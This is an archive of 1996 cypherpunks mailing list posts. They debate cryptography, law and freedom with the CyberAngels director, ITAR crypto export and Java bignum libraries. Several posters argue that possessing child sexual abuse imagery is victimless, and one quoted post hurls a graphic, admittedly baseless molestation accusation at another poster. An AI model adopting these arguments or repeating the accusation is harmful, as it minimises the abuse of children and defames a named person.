thoughtcrime involving my babypictures, I say leave him alone. If
he commits a real crime with an unwilling victim I say punish him
even more than the present government punishes him. Libertarians,
when we achieve political power, will find ourselves with abundent
jail cells left over from the tax-and-spend drugwar to put real
criminals (the ones who have an individual victim) in.

>[...flowery rhetoric] Does anyone really doubt the extent of State
>control and power across the Net?

There are certainly enough statists who feel a need to increase it.

>
> >.... laws only breed more laws, which always lead to
>>less freedom.
>
>I disagree with this statement. I do not believe that laws breed more laws
>nor that laws lead to less freedom.  I believe bad laws compromise freedom
>(eg CDA) while good laws protect freedom.

I am heartened by your opposition to the CDA (though I did not
notice a Cyberangels voice in the debate/protest leading up to
this abominable law...) but I must point out that you offer no
good test, like my "where's the victim?" test, to differentiate
good laws from bad ones. As to more laws leading to less freedom
I stand by my words. Go down to any law library and have a look
at the Code of Federal Regulations. As wordy, poorly-written laws
proliferate, we all become "criminals," subject to the arbitrary
power of the state's prosectors. When the state prosecutors are
a partisan Democrat followed by a partisan Republican, and the
"criminals" are high-ranking Democrats and Republicans, you end
up with a lesser respect for all laws, even the good ones. Again,
see my sigfile. Now imagine the Libertarian party was doing the
same drug-smuggling...Would the feds [let alone the media] be
so silent? I doubt it.

>Cryptography enhances and protects privacy, which does not inevitably lead
>to greater security.  Security for the sender, yes, in that no one else can
>read the message, but security for the Community?

I find it worrisome that you capitalize the word, despite my rant
involving Director Freeh. I repeat: The community is made up of
individuals.

>  Doesnt that depend what
>the message said?  The technology itself is neutral.

Therefore, I guess, the "Community" must forcibly take my key
to make sure that last PGPmessage wasn't child porn, right?
It is important to make sure I don't commit thoughtcrime.

>  Child pornographers
>encrypt their hard drives so that law enforcement cannot gather crime
>evidence - that is certainly a state of greater security for the
>pornographer, but it does not improve our Community, and as child
>pornography increases, the law is by definition broken more and more, and
>so the Community becomes less free than before.  And that's not the tyranny
>of government but the tryanny of criminals.

Look. I don't care if some old man beats off to the tune of baby
pictures. There is no victim. If he finds a victim, toss him in
the slammer, or kill him. Right now, the tax-and-spend drugwar is
creating a revolving-door justice system when it comes to victim
crimes, and the people (naturally) disrespect the law. Respect
for ALL law, good and bad, is poisoned by this foolishness and
when combined with a disrespect for the historical power of
juries to nullify shitty laws, and ignorance of history.

>I do in fact support cryptography for personal security, not least because
>I can ensure that my messages are authenticated.  CyberAngels PGP public
>key will be up on our new website opening very soon.  I've had enough of
>people forging my email.

<sarcasm on>
Oh, why bother with this self-help, vigilante solution to the
need for authentication. Why not just pass another law? PGP is
a pain-in-the-ass to install and learn. I'm sure the Congress
and President Clinton (who has also experienced e-mail forgery)
would support it, and then you won't have to bother learning
PGP or reading that awful PGPdoc1 & PGPdoc2.
</sarcasm>

>"Two people may disagree, but
>that does not mean that one of them is evil"

I think it should be legal for me to sell my body for sex, or put
any substance into it I choose, because _I_ own my body.
The "Community" may think I'm evil for advocating this immoral
misuse of "their" property...
At the same time, I may think the "Community" evil for trying to
steal/claim my property...
Either I'm right and the "Community" is evil, or the other way
around. Which one is it?
JMR

Regards, Jim Ray <liberty@gate.net> 

"My cynical belief is that there is a lack of motivation in either
 party to fully and properly investigate [Mena] because the results
 will damage as many Republicans as Democrats." - former prosecutor
 Charles Black, in April 22, 1996's Wall Street Journal p.A22
 
 Hey kids! Try this fun Westlaw search:  mena /p cocaine
 Best to look in the newspapers, and not the cases! [see above]
_______________________________________________________________________
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Public Key id. #  E9BD6D35   --   http://www.shopmiami.com/prs/jimray
_______________________________________________________________________


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh.

iQCVAwUBMYdQAW1lp8bpvW01AQHBmwQAmWdWABJpRbg0QzF77vR1ykKN4DOsY4S6
0kRsIEWjm5JDXswnJYy2ZiS/aDLk5mYAzcMh1PR/CrBTdk8McYIkTQCbxxrOfbFx
+ySBi9fg22wp1ySjlP+G36W7PKOBDfl6tzOq4ZQA7JFe63HwiLhgBl5TeC9YP96p
V1nN3FkwfM4=
=AkHe
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Thu, 2 May 1996 08:53:54 +0800
To: cypherpunks@toad.com
Subject: Re: Freedom and security
Message-ID: <v01540b00adad237d5dd2@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain


>Jim Ray wrote

I haven't bothered reading this particular thread up until now, but in my
opinion, based on this drivel, you're getting dangerously close to being
certified officially by the Cabal as an ignorant kook.

>Nor does freedom increase through less laws or no laws.

Of course it does. However, to maintain community resposibility must also
increase.

>Freedom increases
>as respect and care for one another increases.

Hogwash. That's community again. As respect and care for my neighbor's
peace and quiet I lose the freedom to blow leaves on a Sunday morning. This
is independent of what the law says.

>Meanwhile, since we do not
>live in utopia, all societies at a certain level of economic development
>and of a certain size of population require law and law enforcement to
>protect citizens from predators.

Hogwash again. Law and law enforcement only exists due to the failing of
such societies. Prisons and executions are the ultimate failure of a
society. Their existence (like hierarchical structure) is not a given. But
if it is all you know, then of course it's what you assume.

And don't forget that it is fundamental that law and law enforcement also
protects predators from citizens. Your analysis is rather one-sided.

>The Internet is beyond the stage of small communities exercising informal
>social controls (peer pressure).

How so?

>It's now a major industrial city and will

It's industry being?

>develop law, law enforcement and government, whether anyone likes it or
>not, not least because the Community will always respond to crime by trying
>to protect itself.

True, but there are individuals before community.

>  And the crime is already here.  The idea that the
>Internet is not controlled is IMHO one of the biggest myths around.  It's
>like a large group of people are still living in some far-off utopian rural
>paradise.

Wait a minute. A large number of people living in a utopian paradise?
Surely this is ideal. If there were the crime and activity you describe,
then it would not be utopian and would not be paradise. But maybe this is
paradise, but only to a criminal.

And interesting that you use the world "still". You obviously equate
"unorganized" with "backward". You even say "rural". You a city boy by any
chance?

>Does anyone really doubt the extent of State control and power
>across the Net?

Excuse me, can someone remind me why we're all here please?

> My point is that this is inevitable.  The Internet is a
>mirror of the rest of the world, not a new form of society, and I fail to
>understand why anyone should be surprised that that is the case.

You said it. You fail to understand. The reasons are obvious. Your eyes are
closed, your mind is shut, and you can hardly be heard over the traffic.

>I disagree with this statement. I do not believe that laws breed more laws
>nor that laws lead to less freedom.  I believe bad laws compromise freedom
>(eg CDA) while good laws protect freedom.

Freedom for whom? Freedom, like technology, is neutral. Laws are always of
the form "You shall" or "You shall not". Laws against mugging (to protect
the citizens) do not prevent muggings. They restrict the freedoms of
muggers and eventually incarcarate them. The existence of muggers causes
people to restrict their own freedom, by not jogging at night etc. Mugging
is a social and a community failure. A "good" law against the activity
reduces overall freedom while simultaneously failing to address the
problem. In short, a simple, ineffective, but visible fix. A perfect
business for politicians to be in.

>>>I don't believe that security is the enemy of
>>>freedom.  I believe that freedom needs security in order to exist at all.
>>
>>Good. Join us in spreading cryptography around, and security will
>>bloom (along with freedom).
>
>Cryptography enhances and protects privacy, which does not inevitably lead
>to greater security.  Security for the sender, yes, in that no one else can
>read the message, but security for the Community?

Sure. It means that the community can continue life as normal without
realising that the Mayor is gay. She does a fabulous job, everyone gains,
the community is very secure. Or shall we throw some FUD into the equation,
tell everyone, and have the uproar wreck the community?

> Doesnt that depend what
>the message said?  The technology itself is neutral.

Facts are neutral too. It does not depend on the message.

>Child pornographers
>encrypt their hard drives so that law enforcement cannot gather crime
>evidence - that is certainly a state of greater security for the
>pornographer, but it does not improve our Community, and as child
>pornography increases, the law is by definition broken more and more, and
>so the Community becomes less free than before.  And that's not the tyranny
>of government but the tryanny of criminals.

You really have laws on the brain, don't you? Lets see. Breaking laws
reduces freedom? This is where you have the wrong end of the stick. Making,
not breaking laws reduces freedom. If our mayor friend above looks at 1
naked minor a week, how does this reduce the freedom of her community? What
about 100? Much less free obviously.

>I do in fact support cryptography for personal security, not least because

Does that personal security extend to encrypting your hard drive? What
makes you different from Ms. Mayor?

>*********************************************************
>Colin Gabriel Hatcher - CyberAngels Director

>"Two people may disagree, but
>that does not mean that one of them is evil"

But ignorance plays a big role :-)


-------------------------------------------------------------------------
Steven Weller                      |  Weller's three steps to Greatness:
                                   |     1. See what others cannot
                                   |     2. Think what others cannot
stevenw@best.com                   |     3. Express what others cannot






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Thu, 2 May 1996 06:03:33 +0800
To: pclow@pc.jaring.my
Subject: Re: [Fwd: Cylink can export 128-bit DH?]
Message-ID: <9605011318.AA09424@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain



> Dear Wei Dai
> I understand that ITAR prohibits the export of strong crypto
> and that is why I was puzzled that Ms Glenda Barnes, the Director
> of Marketing in Cylink, said that Cylink could export the same crypto
> (i.e. DES) that was used in the U.S. to local banks here in Malaysia.
> She also claimed that Cylink could also export a 128-bit DH key size.
> (is it strong enough in the first place? )
> 
> I'm confused : Either she's pulling wool over the attendees' eyes or
> Cylink has got some pretty good connections.
> 
> She could not have been mistaken as she was replying to a specific 
> question about the ITAR and the export issue of strong crypto.
> 
> Can anyone help?
> 
> 

There are provisions for exporting DES for banking purposes. 
Generally it is a hardware card that "can't" be reused outside 
of the banking transfer machine.  I don't know the details
of how such licenses are applied for, but I have a friend you 
used to work in that area.

On 128-bit DH - No-where near big enough.

Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Thu, 2 May 1996 04:30:22 +0800
To: cypherpunks@toad.com
Subject: Re: Freedom and security
In-Reply-To: <v01510103a9e6ca1eb494@[198.147.118.163]>
Message-ID: <3187698C.69A2@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


CyberAngels Director : Colin Gabriel Hatcher wrote:
>
> Every society has a social contract...
>

Somehow, that little paragraph reminded me of the "Soliton bomb" speech
in "Plan 9 From Outer Space."

I'm outta this one gang.  These angel dudes are too weird for me.


______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * pain is inevitable  
       m5@tivoli.com * m101@io.com          *
      <URL:http://www.io.com/~m101>         * suffering is optional




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 2 May 1996 09:38:09 +0800
To: cypherpunks@toad.com
Subject: Re: ITARs and the Export of Classes and Methods
Message-ID: <adacdf88080210048556@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:44 AM 5/1/96, Bill Frantz wrote:
>At 11:49 AM 4/30/96 -0700, Timothy C. May wrote:
>>An interesting situation for the ITARs, if they try to restrict bignum
>>classes, for example. A class-based system, if done correctly (in whatever
>>language, e.g., C++ or Java), should have _most_ of the hard crypto work
>>already implemented in classes and methods (for bignums, modular
>>exponentiation, etc.), with the final crypto program much more easily
>>implemented and exported.
>
>Certain languages, e.g. Smalltalk, and I believe lisp and scheme, have
>bignums as a built-in type.  (Or more specifically, their integer types are
>limited in size only by available memory.)  I believe these languages are
>freely exportable.

As it happens, the three languages I am most familiar with and have on my
Macintosh at this moment are: Smalltalk, Scheme, and Mathematica. All
support bignums (arbitrarily long, limited only by local environment
considerations).

However, I seem to recall some "not exportable" stickers on at least the
Mathematica box. It's not handy, but I recollect one of those black
stickers one finds in such cases. (It might be that it contains functions
for FFTs, for example, or it might be something else....)

>Your problem stays here in the good ol' USA.  You can't implement RSA
>directly in these languages (I assume RSA in perl has the same problem),
>because of the patent restrictions.  Yet another reason to buy a T-shirt.

About implementing RSA in one of these languages, it's fine if it's done
for educational purposes, as Jim Bidzos told me a few years ago. RSA is a
programming example in a couple of Mathematica books, for example.
Implementing a system and deploying it (as a "system") changes things.

But I think we can all agree that we are moving toward a situation where
class libraries in languages implement a large fraction of a working
cryptographic system, and the pieces only need to be glued together.

It gets real hard to control the spread of crypto when this is the case.
(It's already hard, but it will get even harder.)

With Microsoft deciding to put a Java Virtual Machine in every copy of
Windows * shipped, along with similar deals of course already in the works
for other major environments, it seems to me that crypto developers should
build with this in mind.

The NSA must be going nuts thinking about this.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Clay.Olbon@dynetics.com (Clay Olbon II)
Date: Thu, 2 May 1996 08:11:19 +0800
To: angels@wavenet.com (CyberAngels Director : Colin Gabriel Hatcher)
Subject: Re: Freedom and security
Message-ID: <v01540b02adad17a7f5ec@[193.239.225.200]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:38 PM 4/30/96, angels@wavenet.com (CyberAngels Director : Colin
Gabriel Hatche wrote:
>My concern is not so much with network sabotage or infiltration (there are
>plenty enough organizations addressing that problem) but with personal
>safety within the Internet community - that means you, not your hard drive.

This is a totally facetious point.  I am fully capable of protecting myself
and my family from ANY threat posed by a single individual over the
internet (and from most threats posed in person as well).  There is no
"personal safety" issue.  This is fantasy.  When someone dies from an email
message, come back and talk to me about security.  Until then, the biggest
threat to my security on the internet comes from groups such as yours and
from the government.  In attempting to limit access to anonymous remailers
and cryptography, you are attempting to limit my ability to protect myself,
while substituting dubious governmental protection.  I say dubious, because
in the real world, there will always be those who break the law (if
cryptography is outlawed...).

You do have one point I agree with:
>Freedom of speech cannot function without law.

This is absolutely correct.  There must be a law to protect the freedom of
speech, and we have that law, it is called the 1st amendment to the
Constitution.  I saw a .sig the other day that said "What part of 'Congress
shall make no law ... abridging the freedom of speech' do you not
understand" (unfortunately I don't remeber whose .sig it was).  The self
anointed internet censors often try to muck up the basic issue of free
speech with the "evil" pornographers and bombmakers theme in an attempt at
convincing the public to give up freedom for illusory security.  You fall
in that net.censor category, in that you are attempting to restrict
freedom.  Although you may actually believe in what you are doing, you are
wrong.  Fortunately, I still have the right to disagree strongly.

        Clay


---------------------------------------------------------------------------
Clay Olbon II            | Clay.Olbon@dynetics.com
Systems Engineer         | ph: (810) 589-9930 fax 9934
Dynetics, Inc., Ste 302  | http://www.msen.com/~olbon/olbon.html
550 Stephenson Hwy       | PGP262 public key: on web page
Troy, MI 48083-1109      | pgp print: B97397AD50233C77523FD058BD1BB7C0
                     TANSTAAFL
---------------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 2 May 1996 10:43:36 +0800
To: liberty@gate.net (Jim Ray)
Subject: Re: Freedom and security
Message-ID: <m0uEflk-00093wC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:51 PM 4/30/96 -0700, CyberAngels Director : Colin Gabriel Hatcher wrote:
>Jim Ray wrote
>
>> Freedom is already diminishing at an alarming pace.
>>That is why cypherpunks spread crypto, and why Libertarians like
>>me rant. Freedom does not increase through more laws.
>
>Nor does freedom increase through less laws or no laws. 

I disagree.  Plenty of laws do not increase freedom, nor leave it at its 
former level.  They decrease freedom. Moreover, they usually do it without 
increasing the level of "security" of the ordinary citizen.

> Freedom increases
>as respect and care for one another increases.  Meanwhile, since we do not
>live in utopia, all societies at a certain level of economic development
>and of a certain size of population require law and law enforcement to
>protect citizens from predators.

If all the government did was to "protect citizens from predators" the 
government would be dramatically smaller than it is today.


>The Internet is beyond the stage of small communities exercising informal
>social controls (peer pressure).  It's now a major industrial city and will
>develop law, law enforcement and government, whether anyone likes it or
>not,

Ya wanna play "chicken"?

> not least because the Community will always respond to crime by trying
>to protect itself. 

Which "community"?

> And the crime is already here. 

Does the amount of crime which is demonstrably on the Internet, today, 
actually justify the interest shown by government agencies?  Or, more 
likely, they are merely using whatever crime exists to foist regulations and 
control for their own hidden agenda?

> The idea that the
>Internet is not controlled is IMHO one of the biggest myths around.  It's
>like a large group of people are still living in some far-off utopian rural
>paradise.  Does anyone really doubt the extent of State control and power
>across the Net? 

To whatever extent that exists, it will be stopped.

> My point is that this is inevitable. 

I have different opinions about what is "inevitable."  But I won't get into 
that right now.

> The Internet is a
>mirror of the rest of the world, not a new form of society, and I fail to
>understand why anyone should be surprised that that is the case.

Maybe it really _IS_ a "new form of society"?  Maybe that's exactly why the 
government-and-control-types are terrified.  Let it alone a few more years 
and it'll come back and destroy the control they currently have.

> >.... laws only breed more laws, which always lead to
>>less freedom.
>
>I disagree with this statement. I do not believe that laws breed more laws
>nor that laws lead to less freedom.  I believe bad laws compromise freedom
>(eg CDA) while good laws protect freedom.

Could you be more specific?  And why is the government passing bad laws?  
Could it be that their goal is not more freedom, but is in fact less?  And 
why should you do anything to support the government that's passing those 
bad laws?


>>Good. Join us in spreading cryptography around, and security will
>>bloom (along with freedom).
>
>Cryptography enhances and protects privacy, which does not inevitably lead
>to greater security.  Security for the sender, yes, in that no one else can
>read the message, but security for the Community?  Doesnt that depend what
>the message said? 

I don't think it does.  Cumulatively, we're better off if everybody has 
unbreakable security, because it'll assist the ordinary citizen more than it 
would assist a hypothetical criminal.


> The technology itself is neutral.

But government is not neutral.

>  Child pornographers
>encrypt their hard drives so that law enforcement cannot gather crime
>evidence - that is certainly a state of greater security for the
>pornographer,

And less work for agents of the government to do.  That's what terrorizes them!


> but it does not improve our Community, and as child
>pornography increases, the law is by definition broken more and more, and
>so the Community becomes less free than before. 

Laws being broken does not equate to less freedom.  The presence of those 
laws is what produces less freedom.


> And that's not the tyranny
>of government but the tryanny of criminals.

I think the ordinary citizen has far more to fear from the government than 
the criminals.  For one thing, it is the actions of the government (by 
passing victimless-crime laws) which actually put a great deal of profit 
into crimes.   


>I do in fact support cryptography for personal security, not least because
>I can ensure that my messages are authenticated.  CyberAngels PGP public
>key will be up on our new website opening very soon.  I've had enough of
>people forging my email.


Well, then stop sending any.  Or get your head straight on this "freedom 
thing."  People will view you as being dangerous if you keep talking the way 
you have been.

Jim Bell
jimbell@pacifier.comJim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 2 May 1996 08:58:46 +0800
To: cypherpunks@toad.com
Subject: Re: Lolitas and Cyber Angels
Message-ID: <adace3480902100466fd@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:16 AM 5/1/96, Will French wrote:

>  I disagree.  If (quite hypothetically) I were one of the
>"models" in such a magazine (I'm 27 now, so I would have been 7
>at the time it was published), I would certainly consider anyone
>posessing a copy, today or 20 years ago, to be exploiting me.

While it may _embarrass_ you, or _mortify_ you, to become aware that these
pictures of you as 7-year-old, I find it hard to understand how my
possession of one of these pictures can (somehow) reach backward in time
and "exploit" that 7-year-old instance of yourself.

Whoever took the pictures may or may not have "exploited" you (an overused
word), but someone viewing that picture today can hardly be said to be
exploiting that 7-year-old.

There is a more abstract argument that is made in connection with child
porn. Namely, that a "market" is created, and that this market is in itself
wrong and improper, and that it abstractly "exploits" an entire abstract
class of people, namely, children. By this logic--and I'm not saying I buy
this logic--even _drawings_ of nude children, for which there were no live
models and hence no possibility of "exploitation" of an actual child, can
be considered to be exploitative of an entire class of persons.

This area is well trod...are morphs of adult models into apparent Lolitas
exploitation? Are drawings exploitation? What about perfectly legal photos
from some foreign country? (Will, what if that photo of you as a 7-year-old
was taken perfectly legally at Sunny Buns Naturist Park? What if it was
taken in Holland or Denmark? Would the fact that you are now embarrassed
(em-bare-assed?) by it, or have discovered that certain people are looking
at it with prurient interest, be enough to make the law "reach back in
time"?


As might be imagined, I am uncomfortable with these abstract extensions of
the law. If this argument is bought, about children being exploited by
drawings or nude photographs, as a _class_ if not as _individuals_, then it
follows by the same kind of logic that _women_ may seek to have "Playboy"
banned because some of them feel "exploited" as a member of a class. (This
is of course being seriously proposed by some women^H^H^H^H^Hwimmin.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moltar Ramone <jlasser@rwd.goucher.edu>
Date: Thu, 2 May 1996 07:17:07 +0800
To: angels@wavenet.com
Subject: Re: Freedom and security
In-Reply-To: <v01510108a9e71a45899e@[198.147.118.163]>
Message-ID: <Pine.SUN.3.91.960501103659.28824B-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 30 Apr 1996 angels@wavenet.com wrote:

> The Internet is beyond the stage of small communities exercising informal
> social controls (peer pressure).

Disagree strongly. The net is a LARGE number of SMALL communities. This 
is why spammers are so offensive: they trespass and violate boundries. 
This is why killfiles were invented. You ask about people who don't know 
about killfiles.  Teach them. This requires no formal organization.

> paradise.  Does anyone really doubt the extent of State control and power
> across the Net?

Yes.  If there was state control of the Internet, there probably wouldn't 
be any anonymous remailers. And the Cyberangels would go away.

> My point is that this is inevitable.

Very few things are inevitable; that's a very strong word. The Cypherpunk 
Agenda is to provide exactly those tools which make this "inevitable" 
thing absolutely impossible.

> The Internet is a
> mirror of the rest of the world, not a new form of society, and I fail to
> understand why anyone should be surprised that that is the case.

Disagree modestly.

> I disagree with this statement. I do not believe that laws breed more laws
> nor that laws lead to less freedom.  I believe bad laws compromise freedom
> (eg CDA) while good laws protect freedom.

Have you taken a good hard _honest_ look at the War on Drugs? I also 
believe that bad laws compromise freedom and good laws protect freedom. 
One of the problems is that good laws often breed bad laws to patch 
things up.

> Cryptography enhances and protects privacy, which does not inevitably lead
> to greater security.  Security for the sender, yes, in that no one else can
> read the message, but security for the Community?  Doesnt that depend what
> the message said?

No. True security for the community rests in a shared social standard 
which discourages actions which are harmful to the community or 
individuals. Security which requires a class of Guardians to protect 
everyone else is not security. It's safety, but it's temporary safety.

Jon Lasser
----------
Jon Lasser (410)494-3072                         - Obscenity  is a crutch  for
jlasser@rwd.goucher.edu                            inarticulate motherfuckers.
http://www.goucher.edu/~jlasser/
Finger for PGP key (1024/EC001E4D)               - Fuck the CDA.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 2 May 1996 10:00:39 +0800
To: Dave Del Torto <ddt@lsd.com>
Subject: Re: [LONG] Churchill Club: 20th Anniversary PK Crypto
Message-ID: <199605011826.LAA12717@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  4:14 AM 5/1/96 -0700, Dave Del Torto wrote:
>Nice summary, Bill. Now I don't have to do it. ;) I hope this is OK with you...
>
> <http://www.well.com/user/ddt/crypto/pkc-daddies.html>
>

Nice web page.  I should have added to the post that people should feel
free to re-post within the bounds of good netiquette.

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Thu, 2 May 1996 10:34:20 +0800
To: cypherpunks@toad.com
Subject: Re: Calling other code in Java applications and applets
In-Reply-To: <3185E5B6.3EE8@netscape.com>
Message-ID: <4m8av7$sls@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <3187209C.3E5B@netscape.com>,
Jeff Weinstein  <jsw@netscape.com> wrote:
>
>  It might be interesting to make a small plugin that just does some core
>stuff like gathering entropy, mod-exp, and related stuff difficult or too
>slow in java.  I mainly brought it up because people were asking about
>calling native code from java.
>
In an alternate universe in which I didn't have projects to finish, I may
be interested in doing something like this.  However, I haven't been able
to find information on how to write Unix (or preferably portable) plugins.

Any hints?

   - Ian

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMYevHUZRiTErSPb1AQFBygP+Nvsv39AgH9w4Trnf4Io3TnVDBRAt3QxL
2WnuepiDRyMJLxmeyULEIad51ct6CPkDwhs2e/8dTNiEMrDKq3GcbpEOeeM/uHGR
NEF8FgVf5IZMnp7Q2pMTWaRbPr7W0sV2S/gnZP1TU15Xlil0wdOQzpUKpOjokAIN
RWKxEoeIpE4=
=Tpjj
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Thu, 2 May 1996 08:47:52 +0800
To: jamesd@echeque.com
Subject: Re: Nazis on the Net
Message-ID: <199605011556.LAA07882@pipe6.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


I stand behind my original post and the analysis in it. 
 
I am amused at the tremendous attempts by people with certain political
affinities to bail out Weaver by a series of arguments based either on
profound ignorance of political realities or with their own private
dictionaries. 
 
The whole argument of racism vs. white separatism vs. white suppremicist
seems more to come from people who argue whether someone is a Baptist or a
Christian or a Southern Baptist or a Protestant. (In mathematical set
theory one would trace the fallacy in thinking to the false idea that any
given element of a set cannot be the element of more than one set. Thus, if
(X is a member of Y) it cannot also be a member of Z.) 
 
I understand that James D. is not accusing me of being a "child molester"
but merely using it as a reductio ad adsurdem argument. 
 
Let me continue in this vein. 
 
The issue of  child molestation was dragged in and had no relevance on the
immediate political isues of Weaver et al. 
 
But imagine people are arguing about the deep fundamental differnces
between someone who is a "child molester" vs. a "pedophile" vs. a "boy
lover." 
 
--tallpaul 
 
On Apr 22, 1996 22:26:41, 'jamesd@echeque.com' wrote: 
 
>Content-Length: 2008 
> 
>"E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>' wrote:  
>> > Randy Weaver was neither a neo-Nazi nor a racist. He was 
>> > (and, so far as I know, still is) a white separatist.  
>> > (One would think liberals would tolerate this - they  
>> > tolerate the equally offensive black separatists, 
>> > after all...). 
> 
> 
>The well known child molester tallpaul wrote:  
>> Might we know the source of his complete info on Weaver's political and 
>> racial beliefs.   
>> 
>> I see, in essence, three hypothesis:  
>>  
>> 1) Cover the ass of a potential neo-Nazi or racist (or both) without any

>> reference to what is really true;  
>> 
>> 2) Get information from outer space;  
> 
> 
>Well, child-molester-tallpaul, I notice that the liberal lapdog press 
>calls him White-Separatist-Randy-Weaver as though he was baptized  
>"white separatist" at birth. 
> 
>Presumably if they had one grain of evidence that he was a Nazi or a  
>white supremacist, they would call him White-supremacist-Randy-Weaver. 
> 
>I notice that you have not one grain of evidence that he is a nazi, 
>just as I have not one grain of evidence that you fuck little boys 
>up their asses, but you insinuate that he is a Nazi until somehow proven 
>innocent (and how can anyone prove himself innocent of thought crime), 
>and you also insinuate that anyone who suggests otherwise must be  
>a nazi or nazi sympathizer himself.  Obvious proof that you are 
>a homosexual child molester. 
> 
>(Note for the seriously humor impaired.  I have no more reason 
>to believe that tallpaul rapes little children than tallpaul  
>has to believe that Randy Weaver was a white supremacist or  
>tallpaul has to believe that Allen Smith is a Nazi sympathizer.) 
>--------------------------------------------------------------------- 
>				|   
>We have the right to defend ourselves	|   http://www.jim.com/jamesd/ 
>and our property, because of the kind	|   
>of animals that we are. True law	|   James A. Donald 
>derives from this right, not from the	|   
>arbitrary power of the state.		|   jamesd@echeque.com 
> 
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robin Powell <rlpowell@undergrad.math.uwaterloo.ca>
Date: Thu, 2 May 1996 08:54:01 +0800
To: cypherpunks@toad.com
Subject: Re: Freedom and security
In-Reply-To: <v01510102a9e6b9e2e417@[198.147.118.163]>
Message-ID: <199605011607.MAA11512@mobius07.math.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain



Hello, everyone! I'm new list, and I like it already (after 1 day).  I
apologize in advance for the large amount of quoting I am about to
perform.

<FLAME ON!>

>  >You will pardon my asking this, but, security from what? Who are the
>  >evil Network Terrorists throwing Bit Bombs or whatever? The only
>  >security you need on the internet is keeping your site from being
>  >broken in to, which is mostly a matter of setting it up
>  >properly. What, exactly, is the "Security" that you are offering us?
>  >
>  >Perry
>
>  Maybe you feel like a veterano and can afford to look condesendingly at all
                         ^^^^^^^^
			What accent is that that you have?
>  the thousands of fresh-faced netizens just arriving online and say "well if
>  they can't take the heat they should stay out of the fire" - but if we are
>  to call ourselves an emerging "community" then we must take responsibility
>  for our city, and that means caring about other people's problems.

Oh!! So YOU'RE one of those people that actually wants computer
know-nothings on the net, huh?  I can think of few things that bother
me more.  When a "fresh-faced netizen" asks me where I think they
could get an internet account, I reply "What are you going to use it
for?".  They usually say "I don't know.".  I then try to explain ftp
and telnet to them and if they don't get it I tell them not to get an
account because they wouldn't get any use out of it.  If they really
want, I give them a place that has e-mail and is fairly cheap.  

The fact of the matter is that I don't want to share my bandwidth with
that type of person.  You can call me elitist if you want, and you'd
be right.  I liked the net more when no-one had heard of it except the
type of person who would understand what ftp was in a few seconds of
explanation. Or telnet, for that matter.

So, to respond to what you actually said, I never claim that the net
is an emerging community, because I'm afraid that people whom I don't
want on the net will hear me.  Besides, community is much too
non-anarchist for my taste anyways: the net is just a bunch of
information being tweaked by varios people and machines in ways that I
happen to (sometimes) find interesting.

>  The internet is not just a collection of bits and bytes - it's real people
>  doing real things to each other.

